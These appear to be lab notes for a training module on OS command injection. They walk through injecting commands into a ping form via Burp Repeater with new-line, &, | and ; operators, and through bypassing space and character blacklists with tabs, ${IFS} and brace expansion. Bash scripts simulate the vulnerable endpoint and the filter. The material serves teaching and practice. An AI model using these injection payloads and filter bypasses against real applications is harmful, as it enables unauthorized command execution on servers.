COMMAND INJECTIONS

OTHER INJECTION OPERATORS

Try using the remaining three injection operators (new-line, &, |), and see how each works and how the output differs. Which of them only shows the output of the injected command?
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 * submit the expected user input

BURP > Proxy > Intercept > Raw > right-click > send to repeater
 Request
  ...
  ip=127.0.0.1%0a whoami
 * customize the HTTP request 
    - add the payload \n whoami to the expected input (127.0.0.1)
    - the new-line has to reach the server as the byte %0a; typing the two characters \ and n into Repeater sends a backslash and an n, which /bin/sh reads as "127.0.0.1n whoami" (ping fails on the bogus host, its error goes to stderr, and whoami never runs because it is just ping's next argument)
    - highlight the entire payload (127.0.0.1%0a whoami)
    - right-click > convert selection > URL > URL-encode key characters (CTRL+U)
       - URL-encoding the payload ensures it is sent as intended; this step does not turn a typed \n into %0a, so write %0a in by hand
    - send
    
 Response
  <pre>
  </pre>
  * an empty <pre> is the symptom of the backslash-n mistake (only the command's stdout comes back, and ping's error went to stderr); sent as %0a the new-line behaves like ; and the response shows the ping output followed by www-data
  
 Request
  ...
  ip=127.0.0.1%26 whoami
  * & must be sent as %26: a raw & in a form body is the field separator, so the server would receive ip=127.0.0.1 plus a second field it ignores, and the injection would silently never happen
   
 Response
  <pre>
    PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
    64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.017 ms
    
    www-data
  </pre>
  * both outputs: & only sends ping to the background, and whoami runs alongside it (the order of the two outputs is not guaranteed)
  
 Request
  ...
  ip=127.0.0.1| whoami
  * | has no meaning in a form body, so it needs no encoding (%7c does no harm either)
  
 Response
  <pre>
    www-data
  </pre>
  * only the injected command's output: | connects ping's stdout to whoami's stdin, and whoami ignores its stdin, so the ping output is swallowed. This is the operator the question asks for
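To compare the four operators side by side without a lab instance, the script below is an added example (not code from the page or the lab). It stands in for the vulnerable endpoint with a fake ping on PATH and assumes the server side does something like shell_exec("ping -c 1 " . $ip), handing the string to /bin/sh; it also reproduces the backslash-n mistake so the empty response above can be seen locally.

```bash
#!/usr/bin/env bash
# Added example, not code from the page or the lab. A local stand-in for
# the vulnerable endpoint so the operators can be compared offline.
# Assumption about the server side (typical for this lab, not quoted from it):
#   shell_exec("ping -c 1 " . $_POST['ip']);   # PHP hands the string to /bin/sh
# A fake `ping` on PATH prints the banner line real ping prints, so no
# network is needed and the output is deterministic.

stub_dir=$(mktemp -d)
trap 'rm -rf "$stub_dir"' EXIT
cat > "$stub_dir/ping" <<'EOF'
#!/bin/sh
# fake ping: argv is "-c 1 <host>"; only the loopback address "resolves"
if [ "$3" = 127.0.0.1 ]; then
    printf 'PING %s (%s) 56(84) bytes of data.\n' "$3" "$3"
else
    printf 'ping: %s: Name or service not known\n' "$3" >&2
    exit 2
fi
EOF
chmod +x "$stub_dir/ping"

# The vulnerable "application": the user-controlled value is concatenated
# into a command string and handed to /bin/sh, exactly like shell_exec().
# stderr is merged here so the reader sees it; shell_exec() returns stdout only.
vulnerable_app() {
    local ip="$1"
    PATH="$stub_dir:$PATH" sh -c "ping -c 1 $ip" 2>&1
}

# Build the value "127.0.0.1<operator> <command>" (what the ip field
# decodes to on the server) and return what would land inside <pre>.
inject() {
    local operator="$1" cmd="$2"
    vulnerable_app "127.0.0.1${operator} ${cmd}"
}

# Walk the page's four operators. $'\n' is the byte that %0a decodes to.
demo() {
    local op
    for op in ';' $'\n' '&' '|'; do
        printf -- '--- operator %q ---\n' "$op"
        inject "$op" whoami
    done
    # The common mistake: the two characters \ and n instead of a newline.
    # /bin/sh turns unquoted \n into n, so ping gets the host 127.0.0.1n
    # and whoami becomes ping's fourth argument, never a command.
    printf -- '--- literal backslash-n ---\n'
    inject '\n' whoami
}

demo
```

With `;` and the real new-line the ping banner is followed by the injected command's output, with `&` both appear in unspecified order, and with `|` only the injected command's output survives, which is why `|` is the answer to the question above.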

IDENTIFYING FILTERS

Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?
#identifying blacklisted characters - methodology
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 * submit the expected user input

BURP > Proxy > Intercept > Raw > right-click > send to repeater
 Request
  ...
  ip=127.0.0.1; whoami
 * customize the HTTP request 
    - add the payload ; whoami to the expected input (127.0.0.1)
    - highlight the entire payload (127.0.0.1; whoami)
    - right-click > convert selection > URL > URL-encode key characters (CTRL+U)
       - URL-encoding payloads ensures it gets sent as intended
    - send
    
 Response
  ...
  invalid input

#01.start one character at a time
 Request
  ...
  ip=127.0.0.1;
 
 Response
  ...
  invalid input
  
#01.start one character at a time
 Request
  ...
  ip=127.0.0.1|
 
 Response
  ...
  invalid input
  
#02.see if all of the injection operators are blacklisted
 Request
  ...
  ip=127.0.0.1\n
  * sent as the two characters \ and n, so this request never tested the new-line operator at all; the new-line is the byte %0a
 
 Response
  ...
  invalid input
  
 Request
  ...
  ip=127.0.0.1&
  * sent unencoded, so the web server treated & as the form-field separator: the application received ip=127.0.0.1 and ran a clean ping (note the response shows ping output and nothing injected). The filter was never given a & to reject
  
 Response
  ...
  <pre>
    PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
    64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.019 ms
  </pre>
  
 * \n is the accepted answer, and it is the right one: of (new-line, &, |) only the new-line is not blacklisted. The & result above is a false negative caused by the missing %26 encoding, not evidence that & passes the filter; sent as %26 it is rejected like ; and |. To test the new-line properly send ip=127.0.0.1%0a, which is exactly what the space-filter bypasses below rely on
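As an added example (not the lab's code), the script below models the two stages a request passes before the shell and shows why an unencoded & only looks like it passes the filter: the form parser splits the body on & before the blacklist ever sees the value. The field name ip and the blacklist contents (; & |) are assumptions taken from the question; the real filter may block more characters.

```bash
#!/usr/bin/env bash
# Added example, not code from the page or the lab. It models the two
# stages a request passes before the shell: (1) the web server splitting
# the application/x-www-form-urlencoded body into fields, (2) a character
# blacklist of the kind the lab uses. The blacklist contents (; & |) are an
# assumption; the real filter may block more.

# Percent-decode one form value: '+' is a space, %XX is a raw byte.
percent_decode() {
    local s="${1//+/ }"
    printf '%b' "${s//%/\\x}"
}

# Stage 1: the value the application sees for the "ip" field.
# The body is split on a raw '&' BEFORE any decoding, so an unencoded '&'
# terminates the field and everything after it lands in another field.
form_field_ip() {
    local pair
    local -a pairs
    IFS='&' read -r -a pairs <<< "$1"
    for pair in "${pairs[@]}"; do
        case "$pair" in
            ip=*) percent_decode "${pair#ip=}"; return 0 ;;
        esac
    done
    return 1
}

# Stage 2: the blacklist. Prints the lab-style verdict for a decoded value.
verdict() {
    local value="$1" c
    for c in ';' '&' '|'; do
        case "$value" in *"$c"*) echo 'invalid input'; return 0 ;; esac
    done
    echo 'accepted'
}

# Run one raw body through both stages; prints the verdict and, when the
# value is accepted, the exact string that gets appended to "ping -c 1 ".
probe() {
    local body="$1" ip v
    ip=$(form_field_ip "$body") || { echo 'no ip field'; return 1; }
    v=$(verdict "$ip")
    printf '%-26s -> %s' "$body" "$v"
    [ "$v" = accepted ] && printf ' (shell gets %q)' "$ip"
    echo
}

# Constructed request bodies: the operators from the filter tests above,
# each once with the encoding the server needs and the raw & for contrast.
for body in 'ip=127.0.0.1%3b+whoami' \
            'ip=127.0.0.1%7c+whoami' \
            'ip=127.0.0.1&+whoami'   \
            'ip=127.0.0.1%26+whoami' \
            'ip=127.0.0.1%0a+whoami'; do
    probe "$body"
done
```

The raw-& body is accepted only because the ip field has already shrunk to 127.0.0.1 by the time the blacklist runs; the same operator sent as %26 is rejected, while %0a decodes to a real new-line that passes and still reaches the shell.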

BYPASSING SPACE FILTERS

Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file?
#using tabs
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 * submit the expected user input

BURP > Proxy > Intercept > Raw > right-click > send to repeater
 Request
  ...
  ip=127.0.0.1%0a%09ls%09-la
 * customize the HTTP request 
    - add the payload <new-line><tab>ls<tab>-la to the expected input (127.0.0.1); the new-line (%0a) is the operator that is not blacklisted, and the tab (%09) replaces the blacklisted space as the word separator
    - send the payload URL-encoded so each control character arrives as the intended byte
       - 127.0.0.1%0a%09ls%09-la
       - "URL-encode key characters" will not produce %0a or %09 from typed text; write them in by hand
    - send
    
 Response
  ...
  PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.

  -rw-r--r-- 1 www-data www-data 1613 Jul 16  2021 index.php
  -rw-r--r-- 1 www-data www-data 1256 Jul 12  2021 style.css
  * index.php is 1613 bytes
 
#using ${IFS}
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 * submit the expected user input

BURP > Proxy > Intercept > Raw > right-click > send to repeater
 Request
  ...
  ip=127.0.0.1%0a${IFS}ls${IFS}-la
 * customize the HTTP request 
    - add the payload <new-line>${IFS}ls${IFS}-la to the expected input (127.0.0.1)
    - ${IFS} is the shell's internal field separator; unquoted it expands to its default value (space, tab, new-line) and the shell then splits the command line on those characters, so no space ever appears in the request
    - URL-encode the payload so the new-line arrives as %0a; $, { and } have no meaning in a form body and need no encoding (%24, %7b and %7d work as well)
       - 127.0.0.1%0a${IFS}ls${IFS}-la
    - send
    
 Response
  ...
  PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
  
  -rw-r--r-- 1 www-data www-data 1613 Jul 16  2021 index.php
  -rw-r--r-- 1 www-data www-data 1256 Jul 12  2021 style.css
  
#using brace expansion
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 * submit the expected user input

BURP > Proxy > Intercept > Raw > right-click > send to repeater
 Request
  ...
  ip=127.0.0.1%0a{ls,-la}
 * customize the HTTP request 
    - add the payload <new-line>{ls,-la} to the expected input (127.0.0.1)
    - brace expansion turns {ls,-la} into the two words ls and -la before the command runs, so the space is never typed
    - this only works when the injected line is run by bash; if the application's /bin/sh is dash (the Debian and Ubuntu default), {ls,-la} is passed through as one literal word. The tab and ${IFS} bypasses work in any POSIX shell
    - URL-encode the payload so the new-line arrives as %0a
       - 127.0.0.1%0a{ls,-la}
    - send
    
 Response
  ...
  PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.

  -rw-r--r-- 1 www-data www-data 1613 Jul 16  2021 index.php
  -rw-r--r-- 1 www-data www-data 1256 Jul 12  2021 style.css
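The script below is an added example, not code from the page: it percent-decodes each of the three bypass payloads (plus the plain ls -la for contrast), checks that none of them contains a literal space, and prints the argv that bash and sh build from each one, which makes the bash-only nature of brace expansion visible. The payloads are the part after %0a, since that part becomes its own command line; which shell does the expansion is a parameter.

```bash
#!/usr/bin/env bash
# Added example, not code from the page: shows what the shell makes of
# each space-free payload. The part after %0a becomes its own command
# line; here it is percent-decoded and expanded with `set --` so the
# resulting argv can be inspected without running ls. Which shell does
# the expansion is a parameter, because brace expansion is bash-only.

# Percent-decode a payload: '+' is a space, %XX is a raw byte.
percent_decode() {
    local s="${1//+/ }"
    printf '%b' "${s//%/\\x}"
}

# Returns 0 if the decoded payload contains a literal space (the byte the
# lab's filter rejects), 1 otherwise.
has_space() {
    case "$(percent_decode "$1")" in
        *' '*) return 0 ;;
    esac
    return 1
}

# Print the argv the named shell builds from the payload, one element per
# line. `set --` applies the same expansions and word splitting the shell
# would apply to a real command line, but nothing is executed.
argv_of() {
    local shell="$1" payload
    payload=$(percent_decode "$2")
    "$shell" -c "set -- $payload; printf '%s\n' \"\$@\""
}

# Constructed payloads: the plain (blocked) one and the page's three bypasses.
payloads=('ls%20-la' '%09ls%09-la' '${IFS}ls${IFS}-la' '{ls,-la}')

# The sh column depends on what /bin/sh is on this machine: dash leaves
# {ls,-la} as one word, a bash-linked sh expands it like the bash column.
for p in "${payloads[@]}"; do
    if has_space "$p"; then status='has a space (filtered)'; else status='no space'; fi
    printf '%-20s %-24s bash argv: [%s]  sh argv: [%s]\n' "$p" "$status" \
        "$(argv_of bash "$p" | tr '\n' ' ')" "$(argv_of sh "$p" | tr '\n' ' ')"
done
```

All three bypasses give bash the argv `ls` `-la` while containing no space byte; only `{ls,-la}` depends on the interpreter, so when a brace payload returns nothing in a real target, try the tab or ${IFS} form before assuming the injection failed.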

BYPASSING OTHER BLACKLISTED CHARACTERS

Use what you learned in this section to find the name of the user in the '/home' folder. What user did you find?

BYPASSING BLACKLISTED COMMANDS

Use what you learned in this section to find the content of flag.txt in the home folder of the user you previously found.

ADVANCED CMD OBFUSCATION

Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1
